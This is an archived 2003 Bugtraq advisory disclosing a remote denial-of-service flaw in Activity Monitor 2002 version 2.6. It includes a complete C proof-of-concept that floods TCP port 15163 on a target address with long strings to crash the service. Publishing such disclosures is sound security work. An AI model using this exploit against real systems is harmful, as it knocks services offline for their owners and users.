| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <20030529152203.31826.qmail@www.securityfocus.com>
Date: 29 May 2003 15:22:03 -0000
From: Luca Ercoli <luca.ercoli@...ind.it>
To: bugtraq@...urityfocus.com
Subject: Activity Monitor 2002 remote Denial of Service
Overview: "Activity Monitor 2002 is a monitoring software system for real
time employee
monitoring and continuous tracking of users activities on
networked computers."
More information can be found at www.softactivity.com
Vulnerability Description: By connecting TCP port 15163 and sending a long
string, a remote
attacker could cause the application to crash
and exhaust CPU
resources.
Affected Software: Activity Monitor 2002 ver. 2.6
Exploit:
#include <stdio.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <string.h>
int main(int argc, char **argv)
{
int i,ck,port,sd;
char dos[10000];
struct sockaddr_in act_mon_server;
if(argc < 2)
{
printf("\nUsage: %s <ip>\n", argv[0]);
exit(0);
}
port = 15163;
for(i = 0; i < 10000; i++) dos[i] = 'x';
act_mon_server.sin_family = AF_INET;
act_mon_server.sin_port = htons((u_short)port);
act_mon_server.sin_addr.s_addr = (long)inet_addr(argv[1]);
sd = socket(AF_INET, SOCK_STREAM, 0);
ck = connect(sd, (struct sockaddr *) &act_mon_server, sizeof
(act_mon_server));
if(ck != 0) {
perror("Connect");
exit(0);
}
printf("\n\t\tProof of Concept Activity Monitor 2002 DoS\n");
printf("\t\tby Luca Ercoli luca.ercoli@...ind.it\n\n");
write(sd, dos, sizeof(dos));
write(sd, dos, sizeof(dos));
write(sd, dos, sizeof(dos));
printf("\nDoS sent!\n");
close(sd);
exit(0);
}
Powered by blists - more mailing lists